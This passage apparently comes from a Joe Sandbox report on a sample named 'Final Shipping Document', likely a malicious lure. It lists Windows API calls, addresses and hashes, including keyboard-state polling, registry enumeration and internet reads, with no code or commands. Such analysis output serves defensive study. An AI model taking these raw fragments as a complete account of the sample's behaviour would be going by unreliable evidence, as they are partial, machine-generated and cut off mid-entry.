                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressFreeLoadProc
                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                            • API String ID: 145871493-3689287502
                                                            • Opcode ID: ac9024a8dcc0339ce89c417eb619e88cd9040311c84faa0b6383224f6e97d24a
                                                            • Instruction ID: df97ec569fb9e49a3ffe69c765931d9b82328b6738db0bfd3f14d4879247aea4
                                                            • Instruction Fuzzy Hash: 6AE0C236A166225BD2321B25BC58B6FB698EFC3F63B050165FC01F3200DBE0CD0296E0
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BE3CDE,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4E62
                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BA4E74
                                                            • FreeLibrary.KERNEL32(00000000,?,?,00BE3CDE,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4E87
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressFreeLoadProc
                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                            • API String ID: 145871493-1355242751
                                                            • Opcode ID: e9620ecb38303c9d0eec66c53eaf18c57479239925123cb45bd47c91805ef39a
                                                            • Instruction ID: f2a1e799a9c1f0c618d615254cec66e12739eeef8beb83322db0e0582b45dcd2
                                                            • Instruction Fuzzy Hash: 4CD0C2365166215746321B247C48F8F7A98EFC2B113050161B801F2110CFA0CD0296D0
                                                            APIs
                                                            • GetCurrentProcessId.KERNEL32 ref: 00C2A427
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C2A435
                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C2A468
                                                            • CloseHandle.KERNEL32(?), ref: 00C2A63D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                            • String ID:
                                                            • API String ID: 3488606520-0
                                                            • Opcode ID: 4c74d1513bf2f82e7deccda05caed68875178bceb610894083697bfcc52f4930
                                                            • Instruction ID: 65c3ef6b10499b54b3c50abc484ca55d19446cfbec2e76529a1b7d4e84aa5f07
                                                            • Instruction Fuzzy Hash: 42A1C071604300AFD720EF24D882F2AB7E1AF84714F14885DF56A9B792DBB1ED41CB82
                                                            APIs
                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00C43700), ref: 00BDBB91
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00C7121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00BDBC09
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00C71270,000000FF,?,0000003F,00000000,?), ref: 00BDBC36
                                                            • _free.LIBCMT ref: 00BDBB7F
                                                              • Part of subcall function 00BD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000), ref: 00BD29DE
                                                              • Part of subcall function 00BD29C8: GetLastError.KERNEL32(00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000,00000000), ref: 00BD29F0
                                                            • _free.LIBCMT ref: 00BDBD4B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                            • String ID:
                                                            • API String ID: 1286116820-0
                                                            • Opcode ID: a9e524c4932877bc3fd2c32eca5ea61eef7720339d9b3e97fd83efb2e22571a5
                                                            • Instruction ID: 42f9f33a9b06a000ba71df321c878b18575ea0397b4816ec2e255f654a7d8d76
                                                            • Instruction Fuzzy Hash: 7B518371900209EFCB14EF699C81EAEF7F8EB44360B1542ABE554D73A1FB709E419B50
                                                            APIs
                                                              • Part of subcall function 00C0DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C0CF22,?), ref: 00C0DDFD
                                                              • Part of subcall function 00C0DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C0CF22,?), ref: 00C0DE16
                                                              • Part of subcall function 00C0E199: GetFileAttributesW.KERNEL32(?,00C0CF95), ref: 00C0E19A
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00C0E473
                                                            • MoveFileW.KERNEL32(?,?), ref: 00C0E4AC
                                                            • _wcslen.LIBCMT ref: 00C0E5EB
                                                            • _wcslen.LIBCMT ref: 00C0E603
                                                            • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00C0E650
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                            • String ID:
                                                            • API String ID: 3183298772-0
                                                            • Opcode ID: f177c16cb1ae0a02e39134d0052ffe3077d9bee107c263cb732cf43d8635a908
                                                            • Instruction ID: 3dd351c89d4c3fda18f6d7394e5d80f4f6795570a7ccf22735d4cf112026ac24
                                                            • Opcode Fuzzy Hash: f177c16cb1ae0a02e39134d0052ffe3077d9bee107c263cb732cf43d8635a908
                                                            • Instruction Fuzzy Hash: 405161B24483459BC724EB90DC81ADFB3ECAF85340F00491EF69993191EF75A688CB66
                                                            APIs
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                              • Part of subcall function 00C2C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C2B6AE,?,?), ref: 00C2C9B5
                                                              • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2C9F1
                                                              • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2CA68
                                                              • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2CA9E
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C2BAA5
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C2BB00
                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C2BB63
                                                            • RegCloseKey.ADVAPI32(?,?), ref: 00C2BBA6
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C2BBB3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                            • String ID:
                                                            • API String ID: 826366716-0
                                                            • Opcode ID: c2c3986cadbe19886f8fe7be5b75b12ec0412cfde9d5819c326c055fd302acb7
                                                            • Instruction ID: 23510d5d3c1d72c88e8ddd57f4af192083a82c15327f6b1d5a28919e3149d27c
                                                            • Opcode Fuzzy Hash: c2c3986cadbe19886f8fe7be5b75b12ec0412cfde9d5819c326c055fd302acb7
                                                            • Instruction Fuzzy Hash: 1361B031208241EFC314DF14D490E2ABBE5FF85348F1485ACF49A8B6A2DB31ED45DB92
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00C08BCD
                                                            • VariantClear.OLEAUT32 ref: 00C08C3E
                                                            • VariantClear.OLEAUT32 ref: 00C08C9D
                                                            • VariantClear.OLEAUT32(?), ref: 00C08D10
                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C08D3B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Variant$Clear$ChangeInitType
                                                            • String ID:
                                                            • API String ID: 4136290138-0
                                                            • Opcode ID: 0b895080b06b92aa86f6758f427cbfb15b9b2e85ed9d5cfccaf85d4bcbe45c00
                                                            • Instruction ID: ae8777d73348bca973f0728e8f41807a3f53e6a7dbdae283cb2d5bd2c8c7449b
                                                            • Opcode Fuzzy Hash: 0b895080b06b92aa86f6758f427cbfb15b9b2e85ed9d5cfccaf85d4bcbe45c00
                                                            • Instruction Fuzzy Hash: CE517AB5A1021AEFCB10CF68C884AAAB7F8FF89310B158559F955EB350E730E911CF90
                                                            APIs
                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C18BAE
                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00C18BDA
                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C18C32
                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C18C57
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C18C5F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$SectionWrite$String
                                                            • String ID:
                                                            • API String ID: 2832842796-0
                                                            • Opcode ID: c8e50d9668753fd97ff51ccb87ee890e3d665482aa9c2a50ce6d3cc55d08348d
                                                            • Instruction ID: 7d97ba9bc8e91108835be120f67afc7b3d8d6b00bc4f00bf4882856449132acc
                                                            • Opcode Fuzzy Hash: c8e50d9668753fd97ff51ccb87ee890e3d665482aa9c2a50ce6d3cc55d08348d
                                                            • Instruction Fuzzy Hash: 21515A35A042159FCB00DF64C891AAEBBF5FF4A314F088099E849AB362CB31ED55DF90
                                                            APIs
                                                            • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00C28F40
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00C28FD0
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00C28FEC
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00C29032
                                                            • FreeLibrary.KERNEL32(00000000), ref: 00C29052
                                                              • Part of subcall function 00BBF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00C11043,?,7529E610), ref: 00BBF6E6
                                                              • Part of subcall function 00BBF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00BFFA64,00000000,00000000,?,?,00C11043,?,7529E610,?,00BFFA64), ref: 00BBF70D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                            • String ID:
                                                            • API String ID: 666041331-0
                                                            • Opcode ID: 932c385078e70106ea82b5757859a7b42910caf59e0e52070c259e22bcf15b2c
                                                            • Instruction ID: 4bbdfd4c965fbb281edf9cc7e3e766bce25869a58a358e86b7ab0463222b1342
                                                            • Opcode Fuzzy Hash: 932c385078e70106ea82b5757859a7b42910caf59e0e52070c259e22bcf15b2c
                                                            • Instruction Fuzzy Hash: B8514935A05215DFC711DF58C4949ADBBF1FF49314F0880A9E81AAB762DB31EE85CB90
                                                            APIs
                                                            • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00C36C33
                                                            • SetWindowLongW.USER32(?,000000EC,?), ref: 00C36C4A
                                                            • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00C36C73
                                                            • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00C1AB79,00000000,00000000), ref: 00C36C98
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00C36CC7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$MessageSendShow
                                                            • String ID:
                                                            • API String ID: 3688381893-0
                                                            • Opcode ID: fe743b21fa6228a5191cf3c5af8aaea981353c5034a71f52ec51b93bd6e46323
                                                            • Instruction ID: d29d0175dcbba94f2fcffd60ce5d4dec0e581a295c721dae83350f637d0a5083
                                                            • Opcode Fuzzy Hash: fe743b21fa6228a5191cf3c5af8aaea981353c5034a71f52ec51b93bd6e46323
                                                            • Instruction Fuzzy Hash: 98410A35624104BFDB24CF38DC95FA9BBA4EB09350F149224FCA5A72E0C371EE41DA50
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
                                                            • API String ID: 269201875-0
                                                            • Opcode ID: cdf5de6dafb319c2e987115b762df6a9acc9dae5099f6f373bbbc1c71dc60a4a
                                                            • Instruction ID: 3eb8defb9e83ea9b3ebb098a7f3487898da65327011d300195c3a460de0d47e5
                                                            • Opcode Fuzzy Hash: cdf5de6dafb319c2e987115b762df6a9acc9dae5099f6f373bbbc1c71dc60a4a
                                                            • Instruction Fuzzy Hash: 3F41A136A00240AFCB24DF78C881A6DF7E5EF99314B1585AAE515EB351E631AD01DB80
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 00BB9141
                                                            • ScreenToClient.USER32(00000000,?), ref: 00BB915E
                                                            • GetAsyncKeyState.USER32(00000001), ref: 00BB9183
                                                            • GetAsyncKeyState.USER32(00000002), ref: 00BB919D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: AsyncState$ClientCursorScreen
                                                            • String ID:
                                                            • API String ID: 4210589936-0
                                                            • Opcode ID: 91f7dd4fb007af2e3c75b55788f0ea0c84328fd89783e3d585206559473e373d
                                                            • Instruction ID: d52a739c84363192753db4955e1c1177b5bef627ae30259f41406995928ef0b8
                                                            • Opcode Fuzzy Hash: 91f7dd4fb007af2e3c75b55788f0ea0c84328fd89783e3d585206559473e373d
                                                            • Instruction Fuzzy Hash: 33415F7190850AFBDF159F68C884BFEB7B4FF05320F208299E525B7290CB745A58EB91
                                                            APIs
                                                            • GetInputState.USER32 ref: 00C138CB
                                                            • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00C13922
                                                            • TranslateMessage.USER32(?), ref: 00C1394B
                                                            • DispatchMessageW.USER32(?), ref: 00C13955
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C13966
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                            • String ID:
                                                            • API String ID: 2256411358-0
                                                            • Opcode ID: aab3c8410ad2f6dbdd913326f501d850244ac2e9b4b43c12664aeb921e035794
                                                            • Instruction ID: 92a4780192c8a45003f5b09d9717ee20feac7750b2f0b35fc9d39e12af9ada62
                                                            • Opcode Fuzzy Hash: aab3c8410ad2f6dbdd913326f501d850244ac2e9b4b43c12664aeb921e035794
                                                            • Instruction Fuzzy Hash: 2F31A6705043C19EEB35CB359849BFA3BA8AB07318F08456AE876961E0E3B497C5EB51
                                                            APIs
                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00C1CF38
                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 00C1CF6F
                                                            • GetLastError.KERNEL32(?,00000000,?,?,?,00C1C21E,00000000), ref: 00C1CFB4
                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,00C1C21E,00000000), ref: 00C1CFC8
                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,00C1C21E,00000000), ref: 00C1CFF2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                            • String ID:
                                                            • API String ID: 3191363074-0
                                                            • Opcode ID: b34a1e159e6395d195579aa997c945f2d33980d141dd18dcd3f3b5a6447db283
                                                            • Instruction ID: 4e854cecbdbcb5af1774b1c20bf106fdfcec5a133fa0695001a9408a8a05246c
                                                            • Opcode Fuzzy Hash: b34a1e159e6395d195579aa997c945f2d33980d141dd18dcd3f3b5a6447db283
                                                            • Instruction Fuzzy Hash: 88313A71540205AFDB20DFA5C8C4AEFBBF9EB16350B10446EF526E2150DB30EE82AB60
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00C01915
                                                            • PostMessageW.USER32(00000001,00000201,00000001), ref: 00C019C1
                                                            • Sleep.KERNEL32(00000000,?,?,?), ref: 00C019C9
                                                            • PostMessageW.USER32(00000001,00000202,00000000), ref: 00C019DA
                                                            • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00C019E2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleep$RectWindow
                                                            • String ID:
                                                            • API String ID: 3382505437-0
                                                            APIs
                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C35745
                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00C3579D
                                                            • _wcslen.LIBCMT ref: 00C357AF
                                                            • _wcslen.LIBCMT ref: 00C357BA
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C35816
                                                            Similarity
                                                            • API ID: MessageSend$_wcslen
                                                            • String ID:
                                                            • API String ID: 763830540-0
                                                            APIs
                                                            • IsWindow.USER32(00000000), ref: 00C20951
                                                            • GetForegroundWindow.USER32 ref: 00C20968
                                                            • GetDC.USER32(00000000), ref: 00C209A4
                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 00C209B0
                                                            • ReleaseDC.USER32(00000000,00000003), ref: 00C209E8
                                                            Similarity
                                                            • API ID: Window$ForegroundPixelRelease
                                                            • String ID:
                                                            • API String ID: 4156661090-0
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00BDCDC6
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BDCDE9
                                                              • Part of subcall function 00BD3820: RtlAllocateHeap.NTDLL(00000000,?,00C71444,?,00BBFDF5,?,?,00BAA976,00000010,00C71440,00BA13FC,?,00BA13C6,?,00BA1129), ref: 00BD3852
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BDCE0F
                                                            • _free.LIBCMT ref: 00BDCE22
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BDCE31
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                            • String ID:
                                                            • API String ID: 336800556-0
                                                            APIs
                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BB9693
                                                            • SelectObject.GDI32(?,00000000), ref: 00BB96A2
                                                            • BeginPath.GDI32(?), ref: 00BB96B9
                                                            • SelectObject.GDI32(?,00000000), ref: 00BB96E2
                                                            Similarity
                                                            • API ID: ObjectSelect$BeginCreatePath
                                                            • String ID:
                                                            • API String ID: 3225163088-0
                                                            APIs
                                                            Similarity
